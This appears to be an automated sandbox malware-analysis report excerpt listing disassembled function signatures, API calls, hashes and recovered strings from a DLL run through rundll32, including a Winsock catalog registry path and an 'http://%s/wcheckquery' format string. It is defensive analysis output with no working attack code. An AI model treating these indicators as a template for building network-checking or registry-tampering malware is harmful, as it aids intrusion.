                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _swprintf_c_l.LIBCMT ref: 000000018006A6B0
                                                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
                                                                                                  • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_swprintf_c_l
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: ??2@memmove$??3@
                                                                                                  • String ID:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
                                                                                                  • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2321372689-0
                                                                                                  • Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                                  • Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
                                                                                                  • Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                                  • Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2321372689-0
                                                                                                  • Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                                                  • Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
                                                                                                  • Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
                                                                                                  • Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$AncestorFromPointRectmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3039914759-0
                                                                                                  • Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                                  • Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
                                                                                                  • Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
                                                                                                  • Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errnoiswspace$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 972559988-0
                                                                                                  • Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                                  • Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
                                                                                                  • Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
                                                                                                  • Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$CriticalSection$Delete$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 274858031-0
                                                                                                  • Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                                  • Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
                                                                                                  • Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
                                                                                                  • Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                                  • Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
                                                                                                  • Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
                                                                                                  • Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                                  • Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
                                                                                                  • Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
                                                                                                  • Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentHandleModuleProcProcess_wtoiwcschr
                                                                                                  • String ID: DefaultIcon$SOFTWARE\Clients\
                                                                                                  • API String ID: 833562760-2446904873
                                                                                                  • Opcode ID: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
                                                                                                  • Instruction ID: 620cb3c04c623a8aa70c050194555e8f9deebbfdc28fef94ac7d519f34bee134
                                                                                                  • Opcode Fuzzy Hash: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
                                                                                                  • Instruction Fuzzy Hash: BC0272B2601A4886EB429B29C8407DD73A1FB85BF5F449312FA3D436E5DF78CA89C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 1245774677-2131870787
                                                                                                  • Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                                  • Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
                                                                                                  • Opcode Fuzzy Hash: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
                                                                                                  • Instruction Fuzzy Hash: 5C81AFB3700B4882DE65CF15E8447E9A3A5F749BD4F54C222BA9D1B794EF7AD289C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
                                                                                                  • API String ID: 1245774677-2131870787
                                                                                                  • Opcode ID: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                                  • Instruction ID: ceb8e503b58a09837b0f64c0a513370a87b020a4d694bdf072cc47396662b60f
                                                                                                  • Opcode Fuzzy Hash: dfcd8af31725850ee712bb16f67c2dba61d9d14ccc8acf01942b48f66b795e08
                                                                                                  • Instruction Fuzzy Hash: 8251C47371579C82EE59CB16E5143EA6364B34DBD4F108626BEAD1BBC4DF39C2558300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileMutexReleaseSystem
                                                                                                  • String ID: %I64d$__LastModified__
                                                                                                  • API String ID: 4233779698-1650611527
                                                                                                  • Opcode ID: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                                  • Instruction ID: 09458c959511dc8cfabe6624f5c81a29e97a68172d7e622df1c6d3cc80163a48
                                                                                                  • Opcode Fuzzy Hash: 3e8cf2df84acdc051a18ea2821a1bd380114409e3e0b0fa2bea459e4e782fd62
                                                                                                  • Instruction Fuzzy Hash: FF518D72610A0986EB96DB39C8507ED33A0FB49BE8F448321BE3A476E5DF24C649C341
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                  • String ID: dfafidjalkfjdalksjfjklfads
                                                                                                  • API String ID: 3302636555-1647371548
                                                                                                  • Opcode ID: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                                  • Instruction ID: 983dc216bf69003e419ddceaeab5995bac8f8453ed4f95b95033b7c069322061
                                                                                                  • Opcode Fuzzy Hash: 48f47d4bc6a301fdbed38b274010a51a5309dac9b5fb3e5a400d4c7b3d944c6d
                                                                                                  • Instruction Fuzzy Hash: 27515F32701E488AEB55DF65D8807CD33A0F789BD8F448229EA2D47BA5DF38C619C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcessString_vsnwprintf_smemset
                                                                                                  • String ID: com$error_code
                                                                                                  • API String ID: 3912638396-1490343999
                                                                                                  • Opcode ID: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
                                                                                                  • Instruction ID: a6db5d25ead79d5040835bfd854280f02b38994ac018b834727960b236b5b414
                                                                                                  • Opcode Fuzzy Hash: c3fc6b550fc0518e05701da538a0c891b20461f4f7683d40c3e05c31526f994e
                                                                                                  • Instruction Fuzzy Hash: E351D772601D4995EB82DB25D8803DE2360FB88BD8F55C212FE2D476E9DF34CA49C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
                                                                                                  • CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
                                                                                                    • Part of subcall function 0000000180008E20: lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D
                                                                                                  • CharNextW.USER32(?,?,00000002,?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000), ref: 000000018000978E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpi$CharFreeNextTask
                                                                                                  • String ID: REGISTRY
                                                                                                  • API String ID: 1985931122-194740550
                                                                                                  • Opcode ID: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
                                                                                                  • Instruction ID: 0428cfaf942490d5b21421b713593470094f21aa2117f0b0ab62b3aa4edd19b5
                                                                                                  • Opcode Fuzzy Hash: bb15bb951ab1659f25d1c9209306eba5976eaacf2ee56a490b216cac227807d7
                                                                                                  • Instruction Fuzzy Hash: 0041B27271A74982FBA2DF92A9407DA72A5B78CBC4F40C021BF4947795DF79CA59C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Exception$?terminate@@RaiseThrow
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1154302961-1018135373
                                                                                                  • Opcode ID: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
                                                                                                  • Instruction ID: d6fa7f134f72d8ecd5f3bcd88c47d06a78e804b5116f597576f52de847c2c671
                                                                                                  • Opcode Fuzzy Hash: 23d955946db4149c996ac6419d5e890f38151984662b70a56131974dc9aa4251
                                                                                                  • Instruction Fuzzy Hash: 5D519531614BC88DE7668F28C8453E83361FF587A8F249211FA5D07A96EF35D785C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID: http://%s/wcheckquery
                                                                                                  • API String ID: 1980634866-481256882
                                                                                                  • Opcode ID: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                                  • Instruction ID: d06bd9b14ce5bf28a863698d63a9b65a52eeb4a283bf68ad799e7df679026a35
                                                                                                  • Opcode Fuzzy Hash: e44517d9abee306bf729d9c1b39ec77439867e7632e0484d40de2573647f887c
                                                                                                  • Instruction Fuzzy Hash: 0841A032601B4996E7A2CF64E8403DA73E4F788BA4F548125EF8957794EF3CC659C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID: CLSID
                                                                                                  • API String ID: 1980634866-910414637
                                                                                                  • Opcode ID: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
